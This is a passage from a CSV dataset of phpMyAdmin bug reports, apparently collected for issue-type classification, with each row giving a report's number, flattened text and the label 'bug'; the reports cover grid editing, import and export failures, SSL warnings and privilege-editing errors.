git_issue/data/phpmyadmin.csv

54219 lines
6.4 MiB

"project_id","number","text","issue_type"
"24444","10000","Chrome warns insecure content when running with HTTPS.
Hello, I have enabled HTTPS for my phpMyAdmin apache httpd.
When accessing my phpMyAdmin using Chrome v20) I see The page has insecure content warning.
It seems that this warning is caused by the inclusion of http www.phpmyadmin.net home page version.js in functions.js file.
Original URL https sourceforge.net p phpmyadmin bugs 3609 Original author anonymous Found in version 3.5.1","bug"
"24444","10001","Grid editing incorrectly parses ENUM SET values.
Grid uses a trivial way of parsing ENUM and SET column definitions which produces wrong output if any of the values contain a comma a bracket the words set or enum Screenshot attached Original URL https sourceforge.net p phpmyadmin bugs 3610 Original author roccivic Found in version 3.5.1","bug"
"24444","10002","Copy Database Ajax feedback vanishes.
When copying a database, the feedback tab at the top should stay as long as the copy operation is going on however, the ajax feedback div says copying for a very short time and vanishes this gives the impression as if the copy is complete if you close this browser tab, the copy might not actually complete.
Please fix this to display the copying or please wait message as long as the operation is going on on the backend Original URL https sourceforge.net p phpmyadmin bugs 3611 Original author anonymous Found in version 3.5.1","bug"
"24444","10003","Incorrect distribution of content in fieldset.
There is needed middle vertical align in fieldset s table.
Original URL https sourceforge.net p phpmyadmin bugs 3613 Original author mlewandow Found in version Latest Git","bug"
"24444","10004","fast filter title doesent delete onfocus in other languages.
the hint filter table by names in the fast filter box doesn t delete if you enter the box in the German language Tabellen nach Namen filtern stays in the box and if you paste something there with the middle mouse button is lands in between those letters.
in English it works correctly.
tested in Firefox 13 on Ubuntu solution The placeholder attribute http www.w3.org TR html5 author common input element attributes.html the placeholder attribute Original URL https sourceforge.net p phpmyadmin bugs 3614 Original author rubo77 Found in version 3.4.5","bug"
"24444","10005","Insert field functions replaced with Binary text.
When I try to insert a new row into a table using the Insert tab, the place where the function select dropdown is usually located has been replaced with the word Binary .
Not sure what this means, but I miss my functions.
Apache 2.4.1 Win32) PHP 5.4.0 5.5.22 MySQL Community Server GPL) Original URL https sourceforge.net p phpmyadmin bugs 3615 Original author benjamwelker Found in version Latest Git snapshot","bug"
"24444","10006","Inserting editing ENUM columns impossible.
When opening the Insert or Edit page in a table that has an ENUM column, there is no options picker.
Instead, the PHP keyword Array is shown.
The first bad commit is 23b9554.
Merge b1b57f7 791c08b Author Thilina Buddika lt;thilinaabeyrathna gmail.com gt; Date Mon May 14 10 21 38 2012 0530 code improvement in tbl change There is a huge backtrace generated, visible when you enable the Developer setting xe2x80x98Display errorsxe2x80x99.
Original URL https sourceforge.net p phpmyadmin bugs 3616 Original author mynetx Found in version Latest Git","bug"
"24444","10007","MariaDB reported as MySQL.
Using phpMyAdmin 3.5.7 with MariaDB fedora official packages from distribution) In main page Database server Server Localhost via UNIX socket Software MySQL Software version 5.5.29 MariaDB MariaDB Server Attached trivial patch fixes this minor issue.
Original URL https sourceforge.net p phpmyadmin bugs 3828 Original author remicollet Found in version 3.5.7 Attachment http sourceforge.net p phpmyadmin bugs 3828 attachment mariadb.patch","bug"
"24444","10008","Import file give no feedback on completion.
When importing a file into a database, the page will behave as if it s loading, and then stop, giving no feedback to the user about whether or not the process completed it does).
Refreshing the database page will show the new imported tables, data, etc.
So the process completes successfully, but there is no feedback for the user to know this.
I ll look into it and see if I can t find anything else helpful.
Original URL https sourceforge.net p phpmyadmin bugs 3617 Original author benjamwelker Found in version Latest Git snapshot","bug"
"24444","10009","ssl connection to mysql server doesnt work when using mysqli.
using phpymadmin 3.3.7deb7 , connecting to a mysql server which requires ssl doesnt work over mysqli extension.
mysql extension works fine.
server [ssl] is set to true.
file mysqli.dbi.lib.php.orig , line 106 gt; gt; gt; Optionally enable SSL if GLOBALS[ cfg ][ Server ][ ssl ] defined MYSQLI CLIENT SSL )) \{ client flags |= MYSQLI CLIENT SSL; \} lt; lt; lt; makes no sense.
the ssl connection is not properly initialized.
there should be per server parameters for ssl key, cipher etc as suggested in one workaround regarding this issue.
the smallest fix i could do was the following one liner to initialize ssl on the connection before it is initialized gt; gt; gt; Optionally enable SSL if GLOBALS[ cfg ][ Server ][ ssl ] defined MYSQLI CLIENT SSL )) \{ mysqli ssl set link, etc mysql client key.pem , NULL, NULL, NULL, NULL); \} lt; lt; lt; Original URL https sourceforge.net p phpmyadmin bugs 3618 Original author xenium Found in version 3.3.7","bug"
"24444","10010","Support 4 byte UTF 8 symbols `utf8mb4`).
All 4 byte characters in the database stored with `utf8mb4` on MySQL 5.5.x) are being displayed as ?
.
They are fine in the database confirmed by our own scripts that use `SET NAMES utf8mb4` and by using the command line `mysql` utility.
Herexe2x80x99s an example of such a symbol, in case you wanna test this http graphemica.com F0 9D 8C 86 This has been discussed here before https sourceforge.net projects phpmyadmin forums forum 72909 topic 4380272 Original URL https sourceforge.net p phpmyadmin bugs 3619 Original author mathbyne Found in version Latest Git","bug"
"24444","10011","UPDATE statement missing for transformation.
when using grid editing normally generate UPDATE statement after editing.
However, if table uses a transformation for example, a VARCHAR with a MIME type = text plain and a Browser transformation = text plain substr), Do not generate UPDATE statement.
As a hint to debug this ================ PMA getTransformationFunctionAndTransformationOptions ) in insert edit.lib.php does not always?)
return an array, or an array with is correct to feed tfeed to response gt;addJSON ).
Original URL https sourceforge.net p phpmyadmin bugs 3620 Original author thilinaa Found in version Latest Git","bug"
"24444","10012","Search shows no result js error) when tooltips disabled.
Search in any table through standard table search interface shows no result, when in prefs forms.php?form=Features show tooltips checkbox is disabled.
All browsers.
Versions of phpMyAdmin bug in 3.5.1, 3.5.2 rc1.
Original URL https sourceforge.net p phpmyadmin bugs 3621 Original author alsbz Found in version 3.5.2","bug"
"24444","10013","Disabling CodeMirror in GUI settings does not actually disable it.
Hi, When I disabled CodeMirror in the GUI settings panel, it did not actually disable it.
It only removed the syntax highlighting, however the edit box remains CodeMirror.
Only after adding cfg[ CodemirrorEnable ] = false; to my config it got properly removed.
Original URL https sourceforge.net p phpmyadmin bugs 3835 Original author gtoniser Found in version 4.0.0","bug"
"24444","10014","Edit next does not work.
The edit next choice is no longer present in the actions panel in multi edit form Bad commit 98cbdfc Original URL https sourceforge.net p phpmyadmin bugs 3622 Original author thilinaa Found in version Latest Git","bug"
"24444","10015","Insert another new row produces Fatal error.
Insert another new row in action panel in multi edit form produces Fatal error Call to undefined function PMA showMessage ) in opt pma git phpmyadmin tbl change.php on line 129 Original URL https sourceforge.net p phpmyadmin bugs 3623 Original author thilinaa Found in version Latest Git","bug"
"24444","10016","when inserting in a table that has more than one timestamp..
There is a logic error about setting timestamp seen to true, therefore, behavior is different than version 3.5 when inserting in a table that has more than one timestamp.
Bad commit 798ccce Original URL https sourceforge.net p phpmyadmin bugs 3624 Original author thilinaa Found in version Latest Git","bug"
"24444","10017","Cookie auth does not work in PHP 5.2.x.
When setting auth mode to cookie, the authentication does not show the login screen.
Instead, an empty main page screen appears with only the server menubar.
Original URL https sourceforge.net p phpmyadmin bugs 3625 Original author mynetx Found in version Latest Git","bug"
"24444","10018","Upload progress broken.
Call to undefined function PMA getUploadStatus ) in libraries display import ajax.lib.php Probably caused by migration to plugins.
Original URL https sourceforge.net p phpmyadmin bugs 3626 Original author nijel Found in version Latest Git","bug"
"24444","10019","Themes not properly initialized.
I see this error time to time on demo server FastCGI stderr PHP Fatal error Call to a member function getPath ) on a non object in libraries common.lib.php on line 134 PHP Stack trace PHP 1.
\{main\} ) prefs manage.php 0 PHP 2.
PMA OutputBuffering stop ) libraries OutputBuffering.class.php 0 PHP 3.
PMA Response response ) libraries OutputBuffering.class.php 110 PHP 4.
PMA Response gt; htmlResponse ) libraries Response.class.php 308 PHP 5.
PMA Response gt; getDisplay ) libraries Response.class.php 257 PHP 6.
PMA Header gt;getDisplay ) libraries Response.class.php 244 PHP 7.
PMA Menu gt;getDisplay ) libraries Header.class.php 315 PHP 8.
PMA Menu gt; getBreadcrumbs ) libraries Menu.class.php 74 PHP 9.
PMA getImage ) libraries Menu.class.php 139 Original URL https sourceforge.net p phpmyadmin bugs 3627 Original author nijel Found in version Latest Git","bug"
"24444","10020","Query is not shown when altering a table.
When I use the SQL tab in table view tbl sql.php), with a query that alters the table for example ALTER TABLE table CHANGE `channel` `channel` varchar 200) NOT NULL ) and I check the box Show this query here again and Retain query box the query is executed and for one second the message Query executed successfully is shown.
After this, the page refreshes and I m back at the SQL tab with the default query shown, with both the result of my query nor my original query nowhere to be seen.
With non table altering queries such as UPDATE), this refresh does not happen and the query stays visible as expected.
Original URL https sourceforge.net p phpmyadmin bugs 3842 Original author gtoniser Found in version 4.0.0","bug"
"24444","10021","Query is not shown when user is altering Table Similar to 3842).
When we use the SQL tab db sql.php) in the DB view, and fire a query to alter a table alter table table name rename to table new name) of that particular db and even after the user selects the option to retain query and show the query box again, the query will be fired and executed succesfully and after that the page refreshes and goes back to the default query box.
Original URL https sourceforge.net p phpmyadmin bugs 3845 Original author puneetkala Found in version 4.0.0","bug"
"24444","10022","Query in the SQL tab changes the tabs at the top.
1\.
Go to a table in PMA so you have Browse Structure SQL along the top 2\.
Click the SQL tab and run a query i.e.
update insert).
When you do this the tabs along the top change to the default ones that display for the database, not the ones that display for individual tables.
It still has the table name in the breadcrumbs at the very top.
phpMyAdmin version 3.5.1 PHP version 5.3.10 MySQL version 5.5.24 Original URL https sourceforge.net p phpmyadmin bugs 3629 Original author anonymous Found in version 3.5.1","bug"
"24444","10023","Show button above table gives blank page.
1\.
Run a select query to show a few results.
e.g.
select from table where name John ) 2a.
Edit the fields that you selected on using inline editor), so that running the same query again would return no results.
e.g.
change John to Dave ) 2b.
OR, delete those same rows in another tab.
3\.
Press the Show button at the top of the page to reshow.
Instead of showing the usual page saying there were no results, the entire page goes blank apart from the tabs at the top.
phpMyAdmin version 3.5.1 although the bug has occurred for a while now, probably since 3.4) PHP version 5.3.10 MySQL version 5.5.24 Original URL https sourceforge.net p phpmyadmin bugs 3630 Original author anonymous Found in version 3.5.1","bug"
"24444","10024","Outputting schema as Visio does not work.. the .vdx file that is getting saved is really small only contains header, no content.
first I thought the bug was because I was on OSX.
so I tried on Windows, on which I happen to have Visio install as well.
I don t know if it is a prerequisite.
I got a 560 bytes file, that only contains DocumentProperties and an empty lt;DocumentSettings gt; I was using firefox on both case.
I will try with IE.
hmm, does not seems to be a browser aka client side issue) I get the same result with IE.
so, it really seems it is broken.
thank you Original URL https sourceforge.net p phpmyadmin bugs 3631 Original author somekool Found in version 3.5.1","bug"
"24444","10025","normal INSERT does not show the statement.
After a simple INSERT insert as new row and then go back to previous page), the generated INSERT statement is not displayed.
Original URL https sourceforge.net p phpmyadmin bugs 3632 Original author lem9 Found in version Latest Git","bug"
"24444","10026","Problem characters.
Hello, When the data import, my datas with the characters xc3xa9, xc3xa0, xc3xaa, ... are not imported.
The server connection collation and my tables are in utf8 general ci Regards, Original URL https sourceforge.net p phpmyadmin bugs 3633 Original author doxys Found in version 3.5.1","bug"
"24444","10027","Error in generated configuration arrray.
Since of numerous versions, when we use setup and save the config file, all array generation miss the last comma as in cfg[ PDFPageSizes ] = array A3 , A4 , A5 , letter lt; where is the comma ?
legal ); The error is in ConfigGenerator.class.php on line 144 where the line must be ret .= i gt; 0 ?
, ) .
crlf .
.
retv[ i]; instead of ret .= i lt; imax ?
i gt; 0 ?
, ) ) .
crlf .
.
retv[ i]; Original URL https sourceforge.net p phpmyadmin bugs 3636 Original author ichea Found in version 3.5.2","bug"
"24444","10028","After edit global privileges not update.
when I edit a user s privileges and add one global privilege to him, the list of global privileges is not updated afterwards in the list of users.
This works in upstream master.
Original URL https sourceforge.net p phpmyadmin bugs 3637 Original author thilinaa Found in version Latest Git","bug"
"24444","10029","Invalid SQL generated in edit privs.
In Edit privileges , Change Login Information Copy User section , when trying to change the user name and delete the old one, an invalid SQL query is generated.
Original URL https sourceforge.net p phpmyadmin bugs 3638 Original author thilinaa","bug"
"24444","10030","Bookmark creation is broken.
The scenario is browse a table enter a bookmark label click on Bookmark this SQL query Nothing happens.
Git bisect points me to https github.com phpmyadmin phpmyadmin commit aa94d647054e35b28b16bc2802965b9edd925ea2 Original URL https sourceforge.net p phpmyadmin bugs 3852 Original author lem9 Found in version Latest Git","bug"
"24444","10031","Generate wrong SQL statement.
When I create a user by entering a user name, clicking on Generate then on Add user.
This SQL is shown CREATE USER toto4 IDENTIFIED BY ; GRANT USAGE ON .
TO toto4 IDENTIFIED BY GRANT USAGE ON .
TO toto4 IDENTIFIED BY nDJ6sGBfdBUxhtjH WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0 ; Original URL https sourceforge.net p phpmyadmin bugs 3639 Original author thilinaa","bug"
"24444","10032","Blowfish implementation might be broken.
See https sourceforge.net mailarchive forum.php?thread name=20130320135824.08ac240f 40rincewind.suse.cz forum name=phpmyadmin devel Original URL https sourceforge.net p phpmyadmin bugs 3853 Original author lem9 Found in version 3.5.7","bug"
"24444","10033","Check All checkbox does not check all.
When browsing a table, if I click on the Check All checkbox to select all rows, nothing happens.
There are no JS errors in the console.
I ll look into it more when I get a chance and see if I can t track something down.
Win 7 64bit Chrome 20.0.1132.57 m Apache 2.4.1 Win32) PHP 5.4.0 MySQL 5.5.22 MySQL Community Server GPL) Original URL https sourceforge.net p phpmyadmin bugs 3640 Original author benjamwelker Found in version Latest Git snapshot","bug"
"24444","10034","Event comments not saved.
Steps to reproduce the problem go to demo server select a databse click on the Events tab click on Add Event fill out the form, incuding the comment save the event click the Edit link near the event the comment will be missing in the editor Original URL https sourceforge.net p phpmyadmin bugs 3641 Original author roccivic Found in version 3.5.2","bug"
"24444","10035","Advisor does not work with new common functions.
PHP Fatal error Call to undefined function PMA timespanFormat ) in libraries Advisor.class.php 320) eval ) d code on line 1 012 Original URL https sourceforge.net p phpmyadmin bugs 3642 Original author nijel Found in version Latest Git","bug"
"24444","10036","Bug with search and PHP 5.4.
Hello, Server = MySQL 5.5.25 Windows Server 2003 IIS 6.0 PHP 5.4.4 FastCGI 1.5 Since I have updated PHP 5.3 to PHP 5.4, I have a bug with PHPMyAdmin 3.4 and 3.5 versions.
On a specific table, when I do a search on a column with the PMA interface, I do not obtain the result page but I stay on the form page and the top of the page is duplicated the top band Display Structure SQL Search ...... ).
I do not have this problem if I search with a SQL query.
I do not have this problem with PHP 5.3 PMA 3.4 or 3.5.
I do not have this problem with PHP 5.4 PMA 3.2.
I have the same problem on an other IIS 7.0 server with the same database For investigating, I have truncated the whole content of the table and I have just added one row.
Yet impossible to do a search.
I have then deleted the text colums type and I obtain now an SQL error signaling a syntax error the ORDERBY command is empty) SELECT liste of columns.....) FROM`membres` WHERE`pseudo`LIKE Julien ORDERBY LIMIT 0 , 30 I have then deleted an other column a classic VARCHAR column) and the search works well now !
Very strange !
Any idea why the ORDERBY is empty ?
Original URL https sourceforge.net p phpmyadmin bugs 3643 Original author julientld Found in version 3.5.2","bug"
"24444","10037","ODS import error.
FastCGI stderr PHP Fatal error Call to a member function children ) on a non object in libraries plugins import ImportOds.class.php on line 158 Original URL https sourceforge.net p phpmyadmin bugs 3645 Original author nijel Found in version Latest Git","bug"
"24444","10038","Call to undef.d ) when config has wrong perms.
If the config.inc.php file is saved with wrong permissions and you try to login at the phpMyAdmin, the password will taken correctly and the next screen is a blank one.
Normally you get displayed Wrong permissions on configuration file, should not be world writable!
.
But in this version of phpMyAdmin 3.5.2) the Script die without displaying the information.
In the apache2 error.log you geht the following information PHP Fatal error Call to undefined function ) in usr local ispconfig interface web pma libraries Config.class.php on line 755 at the line 755 is a wrong entry original copy of the line 755) die Wrong permissions on configuration file, should not be world writable!
); we changed the line in the following die Wrong permissions on configuration file, should not be world writable!
); Now the information will be displayed normally.
Original URL https sourceforge.net p phpmyadmin bugs 3646 Original author dsi source Found in version 3.5.2","bug"
"24444","10039","User initials not display.
In the list of users when there are enough users), the initials of user names have to be displayed, clicking on an initial button does not bring the list of users having this initial.
Original URL https sourceforge.net p phpmyadmin bugs 3648 Original author thilinaa Found in version Latest Git","bug"
"24444","10040","Errors while editing foreign constraints.
Steps to reproduce.
On the demo server go to the relational view of sakila.film 1.
Submit without any changes.
PMA tries to re create constraints even when there is no change.
2.
Change the ON UPDATE value of one constraint and submit.
PMA tries to re create the unchanged ones also.
Same time it is unable to drop the re create the changed one and ends up losing the old one.
Original URL https sourceforge.net p phpmyadmin bugs 3861 Original author madhuracj Found in version 4.0.0","bug"
"24444","10041","version check breaks ssl.
SSL validation fails with insecure content because of http www.phpmyadmin.net home page version.js Can we get an option to disable this checking please, or some other workaround thanks Original URL https sourceforge.net p phpmyadmin bugs 3649 Original author noelb Found in version 3.5.2","bug"
"24444","10042","No content in change password dialog box.
After changing the user s password if you click change password link again without refreshing the page you will get a blank dialog box with only two confirmation buttons.
Original URL https sourceforge.net p phpmyadmin bugs 3650 Original author yasithacp Found in version Latest Git","bug"
"24444","10043","BLOB download no longer works.
The link to download BLOB field content does not work.
Original URL https sourceforge.net p phpmyadmin bugs 3651 Original author nijel Found in version Latest Git","bug"
"24444","10044","Unable to edit columns in tables containing a dot.
When trying to edit a row of a table inside a database containing a dot .)
in browse view using the Edit icon, PHPMyAdmin returns the following error Error SQL query SELECT `Column` FROM `tab`.`le` MySQL said 1146 Table tab.le doesn t exist Original URL https sourceforge.net p phpmyadmin bugs 3868 Original author widemann Found in version 4.0.0","bug"
"24444","10045","Inline query editor doesn t work from search.
STEPS TO REPRODUCE 1\.
Go to any DB on http demo.phpmyadmin.net STABLE currently 3.5.2; I can t fine a table that DOESN T trigger this bug, so I m not going to include table details).
2\.
Find a and select any table that has at least one row.
3\.
Click the Search tab.
4\.
Enter any search that returns at least 1 result.
5\.
On the results page, click the Inline link below the SQL query.
ACTUAL RESULT The query editor loads without the syntax highlighter, the Go link doesn t work there s no way to run the query), and the Cancel link doesn t do anything the inline editor stays open).
EXPECTED RESULT The query editor should load including the syntax highlighter), and both the Go and Cancel links should work.
NOTES If you run the same exact query that the search did on the SQL tab, the Inline editor link works fine.
This bug has been around since at least 3.5.0, and is a real pain.
Original URL https sourceforge.net p phpmyadmin bugs 3652 Original author justbeez Found in version 3.5.2","bug"
"24444","10046","Can t enter date directly when editing inline.
STEPS TO REPRODUCE 1\.
Browse any table with a date field in it 2\.
click to edit the date field inline 3\.
try to type directly into the date field i.e.
not using the date picker) ACTUAL RESULT Cursor appears in field, but keystrokes are ignored including ctrl V to paste.
I can, however, paste into the field from the context menu.
DESIRED RESULT Typing should be accepted into the field limited to digits and hyphens, perhaps).
NOTES When changing a date by a lot, it s much easier to type the date directly, rather than use the picker.
Reproducible in current Chrome 20.0.1132.57), Firefox 14.0.1) and IE 9.0.8112.16421) on Windows 7.
Original URL https sourceforge.net p phpmyadmin bugs 3653 Original author anonymous Found in version 3.5.2","bug"
"24444","10047","PHP error in plugin interface.
As seen on demo server PHP Fatal error Call to a member function getText ) on a non object in libraries plugin interface.lib.php on line 192 Original URL https sourceforge.net p phpmyadmin bugs 3654 Original author nijel Found in version Latest Git","bug"
"24444","10048","table import from XML file fails.
Exporting a table to an .xml file and trying to import it again fails.
After clicking the OK button to start the import, the inner frame turn to white background only) and stays as it is.
There is no error logged in the apache logs and checking the frame source just shows a single empty line.
The table has not been imported.
This happens at least with v3.5.1 and v3.5.2.
It is known to be OK in v3.4.10.
Original URL https sourceforge.net p phpmyadmin bugs 3655 Original author pilot 001 Found in version 3.5.2","bug"
"24444","10049","Invalid HTML code in multsubmit confirmation form.
The closing tag for the confirmation FORM is missing Original URL https sourceforge.net p phpmyadmin bugs 3656 Original author roccivic Found in version 3.5.2","bug"
"24444","10050","Cannot rename a db that contains views.
renaming a db gives multiple notices of missing variables and missing argument for function.
As a result, renaming a db that contains a view has for effect that the view is lost.
Original URL https sourceforge.net p phpmyadmin bugs 3658 Original author thilinaa Found in version Latest Git","bug"
"24444","10051","cannot copy a database that contains views.
cannot copy a database that contains views.
Original URL https sourceforge.net p phpmyadmin bugs 3659 Original author thilinaa Found in version Latest Git","bug"
"24444","10052","weird confirmation message.
in table operation page, Using the Alter table order by dialog and clicking on Go, the confirmation message is very weird After trying to change the storage engine, the engine is not changed and I see this weird text checked= checked checked= checked Original URL https sourceforge.net p phpmyadmin bugs 3661 Original author thilinaa Found in version Latest Git","bug"
"24444","10053","Doubleclicking for open tree displays loading icon.
While doubleclicking on icon for opening database tree first time after page load), loading icon will stay rotating.
Tested with Firefox and Chrome.
Original URL https sourceforge.net p phpmyadmin bugs 3878 Original author bigbabba Found in version 4.0.0","bug"
"24444","10054","3.4 to 3.5.2.1 functionality issues with Safari on Mac.
Hello, phpMyAdmin versions 3.4 and above are not working properly with Safari.
All of the reported issues have been tested on Chrome and Firefox and they are working properly there.
NOTE The screenshots show browsers in the following order Left Safari, Center Google Chrome, Right Mozilla Firefox Issues include Please refer to the screenshot for each issue) On data edit, Safari goes to the insertion option instead with everything being blank.
All SQL Queries such as Select do not work on and give errors such as import.php Missing parameter import type, format Inserting a row through the Insert option will give the error of tbl replace.php Missing parameter goto ScreenShots Edit Error http i1068.photobucket.com albums u450 dollarhero EditError Screenshot.png SQL Error http i1068.photobucket.com albums u450 dollarhero SQLError Screenshot.png Insert Error http i1068.photobucket.com albums u450 dollarhero InsertError Screenshot.png phpMyAdmin Version 3.5.2.1.
PHP Version 5.3.3 Also tested with 5.4) MySQL version 5.1.61 Apache 2.2.15 Using Mac OS X 10.7.4 Lion Safari Version 6.0 Original URL https sourceforge.net p phpmyadmin bugs 3662 Original author hnarula Found in version 3.5.2","bug"
"24444","10055","php import missing parameter.
I entered a SQL query in the SQL tab as I ve done thousands of times without issue and I got a blank page with these errors import.php Missing parameter import type FAQ 2.8) import.php Missing parameter format FAQ 2.8) Also note that in the bug reporting page it s just over here as I m writing) there s a bogus link that pretends to give information about this For the various missing parameter problems, see http bugs.php.net bug.php?id=31134 That points to an old PHP bug reported in 2004 flagged as not a bug and apparently unrelated.
Even if it is related, that doesn t give much information about the phpmyadmin issue.
Original URL https sourceforge.net p phpmyadmin bugs 3663 Original author sistisette Found in version 2.11.9.x","bug"
"24444","10056","Switches servers after dropping procedure.
I have several MySQL servers configured on the same instance of phpMyAdmin.
If I switch to a different server not the first one in the list) then drop a procedure in a database, after the drop completes, phpMyAdmin switches back to the first server on the list.
Original URL https sourceforge.net p phpmyadmin bugs 3664 Original author mralston Found in version 3.5.2","bug"
"24444","10057","Check tables having overhead link doesn t work.
In database structure page, Check tables with overhead link is doing the same effect as the Check all link.
Original URL https sourceforge.net p phpmyadmin bugs 3665 Original author thilinaa Found in version Latest Git","bug"
"24444","10058","Search results are not displayed.
If a search yealds results, they are not diplayed.
If there are no results, the according message is shown.
This affects any Browser, any server, any theme Original URL https sourceforge.net p phpmyadmin bugs 3882 Original author rm km it Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3882 attachment Bildschirmfoto 20vom 202013 04 18 2014 3A57 3A23.png","bug"
"24444","10059","cannot edit db specific privileges.
t s not possible to edit db specific privileges.
A panel to edit global privileges is incorrectly shown.
Original URL https sourceforge.net p phpmyadmin bugs 3666 Original author thilinaa","bug"
"24444","10060","Export > Custom > Dump some rows input fields are disabled.
In SQL export format, after choosing to only dump some rows, I cannot enter the number of rows nor the row to begin at.
Original URL https sourceforge.net p phpmyadmin bugs 3883 Original author lem9 Found in version 4.0.0","bug"
"24444","10061","Incorrect updating of the list of users.
After updating some db specific privileges for a user, the list of global privileges for this user in the Users overview page is incorrectly showing these db specific privileges.
Original URL https sourceforge.net p phpmyadmin bugs 3667 Original author lem9 Found in version 3.5.2","bug"
"24444","10062","current date from function drop down fails update.
phpMyAdmin Version information 3.5.2 MySQL 5.1.61 PHP 5.3.3 Server RHEL 5 When directly editing a row via the edit page AJAX disabled), I am unable to update a DATE column by selecting CURRENT DATE from the functions drop down list.
The issue is that if there is already a value in the field the SQL query is sent as gt; UPDATE `table` SET `date` = CURRENT DATE 2012 08 17 ) WHERE `id` = 1 If I attempt to update with no value in the DATE column the SQL query will be as follows gt; UPDATE `table` SET `date` = CURRENT DATE ) WHERE `id` = 1 Which also fails because CURRENT DATE ) is not proper MySQL syntax.
In phpMyAdmin 2. under MySQL 4.1.22 this was not an issue, phpMyAdmin would send CURDATE ) regardless of the value in the input field for the DATE column.
Thank you, Lucas Original URL https sourceforge.net p phpmyadmin bugs 3668 Original author anonymous Found in version 3.5.2","bug"
"24444","10063","Frameset doesn t load in Firefox 17a1 due to CSP.
In Firefox Nightly 17a1, the phpMyAdmin frameset does not load.
Instead, each subframe shows an error message stating Blocked by Content Security Policy This page has a content security policy that prevents it from being embedded in this way.
Nightly prevented this page from loading in this way because the page has a content security policy that disallows it.
In Firefox Aurora 16a2, the frameset displays properly.
Original URL https sourceforge.net p phpmyadmin bugs 3669 Original author mynetx Found in version 3.5.2","bug"
"24444","10064","edit date with empty date fills in current date.
When using the cell edit functionality on a date column in a table, and if that cell has value 0000 00 00, clicking it, results in replacing the value with the current date.
The date selector pop up is not displayed or at least not long enough to see it), not giving the user the chance to choose the date with the selector.
Clicking it again after 0000 00 00 was replaced by current date f.e.
2012 08 24), displays the date selector popup as expected.
Tested on Windows 7 SP1 x64 with Firefox 14.0.1 and Chrome 21.0.1180.83 m Original URL https sourceforge.net p phpmyadmin bugs 3670 Original author ruleant Found in version 3.5.2","bug"
"24444","10065","Grid editing destroying huge amount of data.
Version 3.5.2.2 using Firefox 15 MySql After selecting 42 records with SELECT T1.`dataname`, T1.`data` FROM `orders` AS T1 WHERE T1.`ordernbr` = 248753 an inline editing of one of the records was made.
As a result the following SQL was executed UPDATE `mybase`.`orders` SET `data` = Lastname WHERE `orders`.`dataname` = lastname ; As a result the last name field in around 200,000 orders now have the same value !
Original URL https sourceforge.net p phpmyadmin bugs 3672 Original author joergent Found in version 3.5.2","bug"
"24444","10066","Data gzipped twice mod deflate).
When exporting data using the gzip compression the exported file is gzipped twice Original URL https sourceforge.net p phpmyadmin bugs 3673 Original author joergent Found in version 3.5.3","bug"
"24444","10067","Missing parameter goto.
Info Apache 2.2.21 PHP 5.3.15 IE 9.0.8112.16421 FF 14.0.1 Server Windows 7, desktop PC PHPMyAdmin 3.5.2.2 Setup The software is running on a local desktop PC with intranet.
This workstation is used for testing purposes.
PHPMyAdmin is accessed via http localhost or its computers local IP address.
Via a secundairy PC, PHPMyAdmin can be accessed too.
Problem tbl replace.php Missing parameter goto Link http localhost SQL 20phpMyAdmin Documentation.html faqmissingparameters) Handlings I startup any browser, IE or FF, on my workstation PC.
Go to the address of PHPMyAdmin and select a already excisting database.
In any database I select a random table, and try to insert a new row.
No matter if i fill in information for the new row, the above error will appear.
Though!!!
If i repeat the same above steps with from a secundairy PC, PHPMyAdmin functions normally and gives me the expected error that the sql Query is incorrect.
Research The check that causes the error tbl replace.php Missing parameter goto , is initiated on line 32 of tbl replace.php PMA checkParameters array db , table , goto )); function PMA checkParameters line 2055 of common.lib.php), checks wherever GLOBALS[ goto ] exists.
The fact that false is returned that is, GLOBALS[ goto ] is not set), means that POST[ goto ] is not submitted to tbl replace.php The HTML source generated by navigation.php?....
does however create a hidden field for goto lt;input type= hidden name= goto id= LeftDefaultTabTable value= tbl structure.php gt; Thus, or this is not submitted once pressed the submit button, or something is broke.
Printing the content of POST ABOVE line 28 of tbl replace.php, tells me that POST[ goto ] is submitted correctly.
Thus, something is broke.
Printing the content of POST directly BELOW line 28, shows only a few values Array [db] = gt; jeabsyweb main [table] = gt; jb mods [lang] = gt; en ) which indicates that .
libraries common.inc.php has done something with the values of POST, and yes... after tracking down some code it seems REQUEST a merge from POST and GET) handles over the goto value to GLOBALS[ goto ], so far, it works as expected.
However on line 516 of common.inc.php, GLOBALS[ goto ] had disappeared!
common.inc.php 516 = PMA remove request vars allow list); Since goto is not in the allow list, its being unset on line 25 of cleanup.lib.php So, why does the script cleanup?
well... the tokens are off | on line 489 of common.inc.php i added echo PMA isValid REQUEST[ token ]) .
lt;br gt; ; echo SESSION[ PMA token ] .
lt;br gt; ; echo REQUEST[ token ]; giving the result 1 b57f610eaf4bf17dd522de3a21bb5e37 b343ef82381414533671e4458189825a Since the problem lays in the tokens, I have removed all PHP session files.
thought without success.
In order to solve my problem for now, i have disabled PMA remove request vars by returning directly...
So, the actual bug is that the tokens are not corresponding on the workstation, while they are on the secundairy computer.
http localhost SQL 20phpMyAdmin Documentation.html faqmissingparameters 1 config.inc.php does not contain cfg[ PmaAbsoluteUri ], so it is empty.
2 Maybe you have a broken PHP installation or you need to upgrade your Zend Optimizer.
Regarding the PHP bug, I do not have thisone on my workstation, nor is PHP acting weird in other scripts on the workstation.
3 I do not use Hardened PHP 4 php.ini arg separator.input is currently set to ; , thought and ; do not solve the problem.
5 I do not use Hardened PHP 6 php.ini session.save path is set, and to an existing directory.
It also contains files which tells me it works correctly.
If i can provide extra information, I love to hear it.
JB Original URL https sourceforge.net p phpmyadmin bugs 3674 Original author jbtje Found in version 3.5.2","bug"
"24444","10068","Continuous SQL statements causes repeated execution.
When a number of SQL queries are issued one after the other in the SQL tab, nth query is run n number of times.
How to reproduce my case) 1\.
Select a database 2\.
Type CREATE TABLE `test 1` `field 1` varchar 1) NOT NULL) in the SQL textarea 3\.
Press Go button 4\.
Edit the statement to change only the table name test 1 to test 2) 5\.
Press Go button 6\.
Press Go button again do not edit the statement) 7\.
There will be 3 table 2 already exists error instead of just 1.
Also, giving more number of queries in the above manner causes some javascript to become non responsive and hang the browser.
Original URL https sourceforge.net p phpmyadmin bugs 3676 Original author anonymous Found in version 2.11.9","bug"
"24444","10069","User tab disappears.
The User tab disappears due to no reason from the interface.
I am logged in as root user with all privileges.
See attached screenshot.
